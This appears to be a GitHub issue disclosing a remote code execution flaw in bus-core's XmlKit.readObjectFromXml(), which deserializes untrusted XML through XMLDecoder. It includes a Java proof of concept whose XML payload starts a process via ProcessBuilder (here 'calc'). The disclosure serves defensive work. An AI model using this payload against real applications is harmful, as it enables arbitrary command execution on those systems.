Remote Code Execution caused by XmlUtils.readObjectFromXml() via untrusted XML String

Question

Remote Code Execution caused by XmlUtils.readObjectFromXml() via untrusted XML String

Alex111998 opened this issue a year ago · 1 comments

Alex111998 commented a year ago

Description

bus-core provides XML utility classes that may be vulnerable to remote code execution when using XmlKit.readObjectFromXml() to interpret untrusted XML strings.

Detail

The program will call XMLDecoder.readObject to parse the XML string, causing a deserialization vulnerability.

Version

<= 8.0.0

POC

    import org.aoju.bus.core.toolkit.XmlKit;
    import org.xml.sax.InputSource;
    
    import java.io.StringReader;
    
    public class MyTest {
    
        private static final String XML_STR = "<java>\n" +
            "    <object class=\"java.lang.ProcessBuilder\">\n" +
            "        <array class=\"java.lang.String\" length=\"1\">\n" +
            "            <void index=\"0\">\n" +
            "                <string>calc</string>\n" +
            "            </void>\n" +
            "        </array>\n" +
            "        <void method=\"start\"></void>\n" +
            "    </object>\n" +
            "</java>\n";
    
        public static void main(String[] args) {
            XmlKit.readObjectFromXml(new InputSource(new StringReader(XML_STR)));
        }
    }

Attack

Answer 1 · 2023-06-09T09:14:27.000Z

Thank you. Your email is received and will be handled as soon as possible.